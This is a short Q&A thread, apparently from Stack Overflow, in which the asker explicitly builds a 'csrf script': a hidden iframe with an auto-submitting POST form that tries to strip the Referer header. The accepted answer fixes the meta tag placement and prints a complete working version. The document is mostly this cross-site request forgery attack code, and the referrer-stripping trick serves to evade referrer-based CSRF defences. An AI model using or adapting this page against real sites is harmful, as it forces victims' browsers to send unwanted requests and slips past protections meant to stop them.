# "no-referrer" meta tag doesn't work

Tags: html, csrf, meta, referrer

I'm trying to make a `csrf script` which will send a `post request` without sending a `referrer`. My code :

```
<html>
<body>
<meta name="referrer" content="no-referrer">
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://www.example.com/test.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='x' value='y'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
```

I'm trying to use this meta tag : `<meta name="referrer" content="no-referrer">` 
but no succes, there still is a referrer in the post request.

Answer (score 12, accepted):

I believe the problem here is that you put the `<meta>` tag inside the body. However, `<meta>` tags are always supposed to go inside the `<head>` element. You may instead want to put the following code:

```
<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer">
</head>
<body>
  <iframe style="display:none" name="csrf-frame"></iframe>
  <form method='POST' action='https://www.example.com/test.php' target="csrf-frame" id="csrf-form">
    <input type='hidden' name='x' value='y'>
    <input type='submit' value='submit'>
  </form>
  <script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
```

There is more information about this at https://www.w3schools.com/tags/tag_meta.asp.